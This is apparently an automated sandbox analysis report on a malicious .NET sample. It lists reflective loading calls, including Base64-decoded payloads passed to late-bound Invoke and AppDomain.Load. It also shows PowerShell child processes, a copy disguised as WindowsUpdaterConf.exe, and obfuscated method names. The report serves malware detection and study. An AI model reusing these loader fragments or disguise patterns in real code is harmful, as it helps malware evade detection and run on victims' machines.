                            Source: file.exe, -----------.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 0.2.file.exe.5e50000.3.raw.unpack, -----------.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.IjGr4YLfq6ijOuhv3diB7pNzZwwyBPbCztmh9eRlHElrXHmRDoiK68AVMhUSxyIxqhjzChpTZLwhSIv,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.inOjD2O8oEDkXMFMRN8gW7zbSQaNS7BCp4dPTlA5sZkZtKL5eM702mVfdAsvoSdhXmFtwcQMVRNfEmC,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.eSM1sfzUBy3OQSyBxSn1haFL33UvSZyUGI6N9IzNp1YXGfgSJPqk0tSAPcwwM9nJF8l9v46u4JZWgH2,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK._2a1mQ9wTLxzDD0eN59an1BzZLBRaHeiHMVwE4pV9vwMCqBsZYJClyCLyB3ajywyGIG5QJAdkxdml1px,_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.SXaaDM5JN9FfkPKU1X0uay61()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[2],_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.sLcavHXRSWjgrpZMcskEPn7i(Convert.FromBase64String(EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.IjGr4YLfq6ijOuhv3diB7pNzZwwyBPbCztmh9eRlHElrXHmRDoiK68AVMhUSxyIxqhjzChpTZLwhSIv,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.inOjD2O8oEDkXMFMRN8gW7zbSQaNS7BCp4dPTlA5sZkZtKL5eM702mVfdAsvoSdhXmFtwcQMVRNfEmC,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.eSM1sfzUBy3OQSyBxSn1haFL33UvSZyUGI6N9IzNp1YXGfgSJPqk0tSAPcwwM9nJF8l9v46u4JZWgH2,JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK._2a1mQ9wTLxzDD0eN59an1BzZLBRaHeiHMVwE4pV9vwMCqBsZYJClyCLyB3ajywyGIG5QJAdkxdml1px,_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.SXaaDM5JN9FfkPKU1X0uay61()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[2],_9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.sLcavHXRSWjgrpZMcskEPn7i(Convert.FromBase64String(EvuvFrqSwjtrh2F3k3Vf3A4Z1ncG0nlsiXYUe28i7JZ6WM47OTKXf2iulQHK3oiJ0JBKVOcmZDxp191zdYyyhoTO1SBOtW3jQ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_0628BF50 push es; retn 28E4h 0_2_0628ECA8
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_06283943 push eax; iretd 0_2_06283944
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_04854277 push ebx; ret 6_2_048542DA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_04856338 push eax; ret 6_2_04856341
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_04853A78 push ebx; retf 6_2_04853ADA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_04C66348 push eax; ret 9_2_04C66351
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58C08 push ebp; ret 9_2_08C58C12
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58C1F push esi; ret 9_2_08C58C22
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C56DA0 push ds; ret 9_2_08C56DDA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58BCD push edx; ret 9_2_08C58BD2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58BD8 push edi; ret 9_2_08C58C42
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C56BE8 pushfd ; ret 9_2_08C56BE9
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58BF1 push edx; ret 9_2_08C58BF2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C577F0 push eax; retf 9_2_08C577F1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_08C58B68 push eax; ret 9_2_08C58B92
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00A6633D push eax; ret 12_2_00A66351
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_072A0CE8 push es; iretd 12_2_072A0E18
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_072A0A4C pushad ; iretd 12_2_072A0A59
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_072A08B8 pushad ; iretd 12_2_072A0A59
                            Source: C:\Users\user\AppData\Roaming\file.exe, Code function: 14_2_064DBF50 push es; retn 4DE4h 14_2_064DECA8
                            Source: C:\Users\user\AppData\Roaming\file.exe, Code function: 14_2_064D3943 push eax; iretd 14_2_064D3944
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 20_2_00BB42C8 push ebx; ret 20_2_00BB42DA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 20_2_00BB636D push eax; ret 20_2_00BB6371
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 20_2_00BB3A63 push ebx; retf 20_2_00BB3ADA
                            Source: C:\Users\user\AppData\Roaming\file.exe, Code function: 22_2_00D7432E push esi; iretd 22_2_00D7432F
                            Source: C:\Users\user\AppData\Roaming\file.exe, Code function: 22_2_05743943 push eax; iretd 22_2_05743944
                            Source: C:\Users\user\WindowsUpdaterConf.exe, Code function: 27_2_05993943 push eax; iretd 27_2_05993944
                            Source: C:\Users\user\WindowsUpdaterConf.exe, Code function: 30_2_0619BF50 push es; retn 19E4h 30_2_0619ECA8
                            Source: C:\Users\user\WindowsUpdaterConf.exe, Code function: 30_2_06193943 push eax; iretd 30_2_06193944
                            Source: C:\Users\user\WindowsUpdaterConf.exe, Code function: 33_2_0656BF50 push es; retn 56E4h 33_2_0656ECA8
                            Source: C:\Users\user\WindowsUpdaterConf.exe, Code function: 33_2_06563943 push eax; iretd 33_2_06563944
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.cs, High entropy of concatenated method names: 'K9XA0MuQRxg5yw0QUDlsjlgxO7uy6vmvwrQXX33aSN4BrPXjQMVx6dLo4', 'JmARQ86YpVqvhJkos4MRrtrif2JJPZ7VTcSxMhJswqNxoyFdm0sUuIsJ2', 'f2uAebM4xgQY5lPbuDQfm9EZmvNRKNLGxMYc8U3110BcaBCZh4vhFwiIr', '_4ki5WBWFixhnDNZRyD3kowsNZjWTQNOwUPMU20MrVPozCz9l6ZPyCnUI2'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, pfAXNycGHAG9kHhBkDfdq9Qh.cs, High entropy of concatenated method names: 'Hy0GpbxnyfIjTFLUbwTTgUtH', 'xL9WCTr1T3K8BYRupgvAuUFC', 'yQISydyksn5WB9ow7uWZGfII', 'nicnsxzRwvvu1DJ3', '_3OeJQFgMVdXCU1xw', 'jM69T1JoWmRFNFVz', '_76C2w2PDBor8TUdJ', '_653n0ryEbprJKMX6', '_7ev324fcMk6FxYJI', 'UBQ6daJQFfse7pu9'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 0anWj12JiqHi3ExnbtL4gRxKQ9dvhPcB3yf9stajqoMVQj0.cs, High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'RN917BecpTlt3F8WjhUCNP4ZFcccUYyhzcn5x9MPLKct98vzEeT03kis5', '_1RgY3FeOTFA32tsnQFdUG701mo6G95leERty4TzJie8PMJ5ByKHI8c3uc', 'Mpih3O2Pj1rQldUeFi2NwQVgjl29On567DDgSUSMDtoRyrJjhmpt7jktt', 'NLDIfNaPp8NA5VyaOGm3k8jX95BHcMSKIhZv8T90W253F0zQfUZT2mDUQ'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs, High entropy of concatenated method names: 'svIVH2g0GRQQ1hJ8WZJ7daHF14Qgd7czCpgJHffgyX6OFduLTXs5erCcrrSHMyYdMR3itRhnJfZrX1fzyZ', 'XvkThZKqBYrKIAQAyU4HpVxkXsSu45yxeaO7ilZNtsZsnBky3L4vAZFBiXRfnqCPaC8UMoVfHH1zZDmG5f', 'yFTrsmMel7VjSIKCYJ2VMuVBpaNcqvSFFxqlzWTDwLrJ9gOEaDxQdNT0XjXVX2ZiXtAFdZrYIHdIwLE9ab', 's1nHvyPBy2ZgyEt7QkPceAsyhKYYqDn63hEgAq9b3kkxeGFH9VWufCbERXe0lcgrGPxuGwEHWjjkb9b2NZ', 'nKodDjI2B5tzJ2yJx6AftFzt6Nq9T6hEeZNN7IhiC9mzhWb0MhwyZdjIbHlCumV7IBPmdPt5hbtZ6UjiQT', 'tnapOiSTs3cqX6BBSBu3zPZ1H3j17Yp4JW5QgiKf6rOxjmUqT5cK4HbVwdsKhShRDNZoO8OERkj6URTNBI', 'VAkgx9sLYTHkJSLkY5JTGhIeBMQCULipbGNCrgtTMWapsy8IIgmFrsU4BbyVQsjZljMS94Iqrl9O1b2wIi', 'b6RXb4BKZRzYeoYFWsftu0oKMA9PzhPZPf3xQI4R5htgzzJzeF9AWF0nQ6oek9xwg3rGRV1fSzMRwQFNO6', 'MzcUqZzrRrXbeDcP4IefqyUDhjICNJqxysm51AlaPF9couSRUydPAUUOu5DBGPJjzIIyHoqIqahWKrigkw', 'VqEZfeqhL4QeYglvZAF0uNzM6l6vkcNIDUGUUREGXsuYtw2lzi59NZTzagYOr2FoFgi5q9uTRn80tGP61s'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, tMAO7r0WOHxgOVEd4d8e72ywS3khYGrhlo8SRKKdrOhg6nZsRJKiewQT6qQGnKLIg1Gk86nO2p2g9qkpwi1mCSLBSK0tiIHqe.cs, High entropy of concatenated method names: 'Ca8zTJzOXdF1XSQ4Uk0FpAFOo2rQu3qbkh4a0jpCsszx69orcafgt1pMRuFysXcXVAvdzJfHK63BB3tIGhrx4UKJ9mCvGLImf', 'BsCxD3ZFBlqUAqkw03C6OFawqiuJh3FVrNq0AgUWOGTQr7W8KOdwxqAwhFyto07VH5QDaNuaDs', '_9g2PIVvmky60SRYqFTZNlEQzWl9HFnjfpjn79uczsnelcSLVM6ibgvMmvV2m4RueNeX1KUoTUi', 'IKtuZHsgDWC23EuZTzfTYEfHyq1TlxU1yd8VTwwOo2fzonMq2bCGGwrfJfCjLyuUFv7a14FKK9', 'wAdgfIPx5SYAlzcBKO4ZSEn5QqcenKawSCKd2N1ZgXAT8Tpvf2HiBLcyfE4CLe02H6JhqLYlNF'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 1BnXPKwu76MD4Cb65M8LmHIXPTlBOv59WZ1m6mGJAeUj7kFFjXtQiFRcNjc82JltgpD9ADnTthvnNFa.cs, High entropy of concatenated method names: 'jIAts4J7SShl0SnZCZ2gkzALnqqFAo4knxgDjyFyJsZy1KIf1yHykqF6IZmxWb4Oh5PhFHKTxcMFkgS', '_5eoEBBaBTWXSnJuepoNs4TcTHnr3VaddTKrQTF7zHuQ4ieGz5VTy1TjfXgqAEu05O2p7B8SnuZQTXTN', '_8sQh8EFYtgGY75yOMZGvjiNpOx2woGZ8rtJtHNHiKriCeH5BWwPFnGGXGTc1lD6zS4fv8jqc0UjGS8Q', 'BKBKCNODvQeLG22I0jqWMaps9uX5tsbUkthYpvVUSXWA2vy8ElYjtzZ6Y1fsnNmCR6UqEg78PYVKtHm', '_5elUGeMwq7NNd8a51NAP90UUpqyL2LrjGXRB8Baz8Vl3nYZ3m7hB0eKQzUtvyqQafhXIgEosJGyTF5m', 'mGssgndyPnxcE0LtnEdfXXZvvXiLgd94fm2h93iPrXnLEBQ4tsxxVwLgLUmaZFclPRPkCyq4wullJcP', 'mmhaWzq3hbZDQtQfBmi6A8xsuojtIjpwkYcuSyKWQpGn8eeV49dKJNKyspXSyPoHnlpCJbEEajwDCSD', 'Qyn7BLsbvR7PFqxIiNVP1v0Q1fRYiLQ3u9c8XODGPmTC3z983bEsXg5aGSMYT8tIr8FQikYx1E1nSQY', 'rczk6Yu4zaajD1rmtzB9W3U5xfWVLQc0dZ9gHgkoolEU8t8kcGKnqIEQW9sbreo5KK9YXalLfdWyor4', 'oWOoQ0Q4mLJozToPqQOyElta7Iv7g8WQknxxwudkN1nxvdtcWtsHoKdZTs58Bzrxysq95A8Uf3RiImG'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, k8oQBqD1FfB24uQwQAjscQBcsRADnbcSlYbhctv49NQ6vnVNBf7Ya7d8yz6WlHsmiF1cUrk5wKP0Ck0EhJaUIVsGRyNgB9EqY.cs, High entropy of concatenated method names: 'PURSdKwf6uUyuIeo01L2wrL5YXcCJwixZhm674K30OY5BSgs3bqlEy7laHmEUyKJbssQbefNGkLpdhY3qbUxPJoFdHC8GIG51', 'L5841UcNRl6sDIKgIUn3k62zuYMJHDch8788FKzYRQFFOUztBjvifBP2qT8N9IoOGAnVTSiitdywd3xyNAQhJQZG5qaN8fzId', 'ra1ye9xo1HKMcEldMPxQsQP6MYWDbRGeaR9jjEdpj4oHwTnSXZisafqZoHJuduP461A7BqNDnqxosaRnqz83lKIRGNuwDqgfF', 'qukIAc99XGERtJeVCLU6USjGcFvgJkBC5LR9CG6P39hljCvzMCa2ZZUDAh0jH1cp2ybshyw0BgGNqF6qLJdRF3Qjjr8Qv0h3k', 'pYTsImnQKLmW3xKKnPrcg35rY9B4i7SlFf0KkFgEUlsXt4FsAarRYyrwyBtoGBfMMams8IHUQHxxK6RnLRo3baRsA6hsti8l5', 'O30rLSFEndQTifNrEdMCJg4ZFU3JKpzjswfnYbvdDKQKolSQKiGrPlNPxrcqdc2Rk0lGuhxO4mn3W7h9UWxUNaRyRvkMpzj5o', 'tRZmsk83jO6u1QL1ZvHrVPrzQe3b35wwRa6PdBHZkAJsJjjLWup4g6eNPMwBmzli1LqREsOVzV9aDhDQeuZ7isup9XyjeuWbs', 'ebOrWyYhaOZ9d7RJL2HfVfNxqSknUkHnvcMkdbLk3d8QaRnKq2jVXnNXzOuy8GLIfV4DKNpWX9N5v5KsFs2fztNI6GfRjoX3V', '_0OjaokSk0Jw2HMEf8RKTQlO4kotXk9ZR8ZhunU18WGsvtNiWdTrBvfCqTBVgLwLuyFQINmEhzNqytgMfn3', 'IolwZpH1HLIXDIPe24xVknOEjyfwUu6y82DwGcLuyJxiMcYNZjBhCw0dZZx5fqQPNCLn949YUJOPHzjRk1'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs, High entropy of concatenated method names: 'Lhw0EuwZ1fYIXLm5zrgpgRUbVTHXSDF2UCl7sGRGNiKZGMaC27UtCm3qDwC0ozmQ', 'OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS', 'G8yIH49uHGWslxXVEd59mIK5OUM3NiHV3KycjgvoyP5SJ2cB6Ytwzi9pIVfYU97n', 'ZekE3xuuJcMYGquyAUKRuDmYetQzqS06YpX1KnoRr9qre5jhasUlcExY45yFYOLS', 'RBvskQfc3AMcmgirQvncxeQJmjmgL7YQ9wUr2I8WJ66RnIqfjOnevV11hsmxUJgR', 'f27hxCph9imrmui07eYZcWhaU1AMkeEzwgi4CyHQVeVpnmYkk0YqUkWyH7kUhKn0', 'T4J9MR6iuMf1VdM9IW27cNsEc15XpDFbjQ1ZWWz00SeCAUibCNaBGdPXYGplydzA', '_7GI4uKlZRmnHlcjXo4KgOrdzuxBpaTwB9sOr8xhMgBMQp03dZ8lwkpUs6EtCEbgy', 'js9mCAIRcVKsY7NmghkvjOTA96W5z24CKxGN1hjyzZzD5llhBusXMY0MAFNbej4KswDAGE5ZpKlk9fynf6c18hdZ0UgLYTGO0', 'sP9vXYu5dJDBXVSoG3JOQWdBdVjvv2yf1yp5J1hZnpH60pPk2kYAO8pNuMAsXoEm9fdJzi2VVNywQ0VZnwMWSwgj7hF6uwtdF'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.cs, High entropy of concatenated method names: 'H2RSsZFKRrHRT65cfj1Xt86ijqMLzBbhqqyo9tS3BTuyFl36DNaS74BiNpx9RXeFVIr0gOFUpzoNkqevAK', 'm7jKQ9artMQi15JY', 'cC6KrzcON6oUu94C', 'xlFJfWFmLDceh0wF', 'IV62WVx1P90yMgcl'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.cs, High entropy of concatenated method names: 'ltdvSTmuDwBFxehfhJITmk7EjiC5LtSjvbgKwuUpdQh9Sh9IDPHrvBVnvmOmDjRI', 'OzPzG0vNO9oBkRBCfVLBP3EqlDUV3EoLZznjtrjt7nZtyUeWKNPez4kBqSY9ObiU', 'uodld5Psb4FuTMXQf6h7IUWD6PTMuS2Qc7TBCPiTqUieoTGTmRKHOPncvTJic8rB', 'u1WayCkYPUkQZgvoxrdU33C45lKbkZr044i1dl9TxVWnUpRCo1c2bpBZKyfTvxpa', 'uB0MHsnOyEIA2Wrc8yUc6BijIDBv6tPvlQ2YGbJaEJmL9jeiVkNss7RyTRwOoWB8', 'WLW7MpcGbsiFbXTpRmancjelVxRWkFNRZbTbYhbrRKoLsPlM5Yqi46CRoqhzZdSu', 'Kk1RT2LIUI7b6bfYb8aSFepH5gkeFIO4somhtQ50uLzx31p0mGX60fXO9yKICQp0', 'Vk2sUIA1bkvO8AhgrzBdwWMlWz0YBDwolSLiYjRWqygIAb3yH3X5DL36Xh2SynWC', 'XgdUNkMUXEXGC2TVTReadLd0ZlSGfqldf228i9ggBJH3QVbMB0ybcOg8h5B8q1pM', 'plvpD1pR7iBdqDimQRP5q9IEu8BUfF9RjWsg0JDOrhivlMC7fsfXUeR5JV6SuHGD'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, d46Zv2qYbaQJDMbZ7Xt1F2PnAlaWbc40N1LuG79B9IpFWHdOqXitnmSGc4QjuU9D7djj6HwceM2y3rralb.cs, High entropy of concatenated method names: 'W1SH7JjcsI8sTnwKEy5ILvF0kL2cI0ZyQY6ygglXZsU3AqHKHFLb5nTJMzn1opEmHsqhnssg8igxNeTjqV', 'Bc8aYFCKF5DlIWuz0WE9up88nhWMEFbsJWzwk8E1IbVfAFN3LVm6HRwfQBq1HyNFqog2785atf61STkiA4', 'sxCXhjmnGtAQ7QpCyXm6hPTO0WsFjg7RxaeRT87XPU9lJIBzdNXhy01KK7wlmU5GdENw8yZkuTKyBL8cpw', 'C24mPs6zaxpv5tbRh4agFza8K3WvAQU9CRVWmTlOYUKp4MTfUxlFze2YOxO4evCawHj5xbwv0sYz1F12w1', '_8aGks2WbjOcupJTr0kPmVoHQknH4VTxWv6BUfJhJ99GLXd7ytrXvFtow9Pnas76JTrSuArqfYQ', 'rLHAojLGqYxJ2rxj', '_0xB1uBLsDSIBpH4x', 'mXJA63SBxx6jb4pQ', '_32sqqCGc2QDZqDpG', 'nQSinV7QBHDbQCpk'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.cs, High entropy of concatenated method names: 'K9XA0MuQRxg5yw0QUDlsjlgxO7uy6vmvwrQXX33aSN4BrPXjQMVx6dLo4', 'JmARQ86YpVqvhJkos4MRrtrif2JJPZ7VTcSxMhJswqNxoyFdm0sUuIsJ2', 'f2uAebM4xgQY5lPbuDQfm9EZmvNRKNLGxMYc8U3110BcaBCZh4vhFwiIr', '_4ki5WBWFixhnDNZRyD3kowsNZjWTQNOwUPMU20MrVPozCz9l6ZPyCnUI2'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, pfAXNycGHAG9kHhBkDfdq9Qh.cs, High entropy of concatenated method names: 'Hy0GpbxnyfIjTFLUbwTTgUtH', 'xL9WCTr1T3K8BYRupgvAuUFC', 'yQISydyksn5WB9ow7uWZGfII', 'nicnsxzRwvvu1DJ3', '_3OeJQFgMVdXCU1xw', 'jM69T1JoWmRFNFVz', '_76C2w2PDBor8TUdJ', '_653n0ryEbprJKMX6', '_7ev324fcMk6FxYJI', 'UBQ6daJQFfse7pu9'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 0anWj12JiqHi3ExnbtL4gRxKQ9dvhPcB3yf9stajqoMVQj0.cs, High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'RN917BecpTlt3F8WjhUCNP4ZFcccUYyhzcn5x9MPLKct98vzEeT03kis5', '_1RgY3FeOTFA32tsnQFdUG701mo6G95leERty4TzJie8PMJ5ByKHI8c3uc', 'Mpih3O2Pj1rQldUeFi2NwQVgjl29On567DDgSUSMDtoRyrJjhmpt7jktt', 'NLDIfNaPp8NA5VyaOGm3k8jX95BHcMSKIhZv8T90W253F0zQfUZT2mDUQ'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.cs, High entropy of concatenated method names: 'svIVH2g0GRQQ1hJ8WZJ7daHF14Qgd7czCpgJHffgyX6OFduLTXs5erCcrrSHMyYdMR3itRhnJfZrX1fzyZ', 'XvkThZKqBYrKIAQAyU4HpVxkXsSu45yxeaO7ilZNtsZsnBky3L4vAZFBiXRfnqCPaC8UMoVfHH1zZDmG5f', 'yFTrsmMel7VjSIKCYJ2VMuVBpaNcqvSFFxqlzWTDwLrJ9gOEaDxQdNT0XjXVX2ZiXtAFdZrYIHdIwLE9ab', 's1nHvyPBy2ZgyEt7QkPceAsyhKYYqDn63hEgAq9b3kkxeGFH9VWufCbERXe0lcgrGPxuGwEHWjjkb9b2NZ', 'nKodDjI2B5tzJ2yJx6AftFzt6Nq9T6hEeZNN7IhiC9mzhWb0MhwyZdjIbHlCumV7IBPmdPt5hbtZ6UjiQT', 'tnapOiSTs3cqX6BBSBu3zPZ1H3j17Yp4JW5QgiKf6rOxjmUqT5cK4HbVwdsKhShRDNZoO8OERkj6URTNBI', 'VAkgx9sLYTHkJSLkY5JTGhIeBMQCULipbGNCrgtTMWapsy8IIgmFrsU4BbyVQsjZljMS94Iqrl9O1b2wIi', 'b6RXb4BKZRzYeoYFWsftu0oKMA9PzhPZPf3xQI4R5htgzzJzeF9AWF0nQ6oek9xwg3rGRV1fSzMRwQFNO6', 'MzcUqZzrRrXbeDcP4IefqyUDhjICNJqxysm51AlaPF9couSRUydPAUUOu5DBGPJjzIIyHoqIqahWKrigkw', 'VqEZfeqhL4QeYglvZAF0uNzM6l6vkcNIDUGUUREGXsuYtw2lzi59NZTzagYOr2FoFgi5q9uTRn80tGP61s'
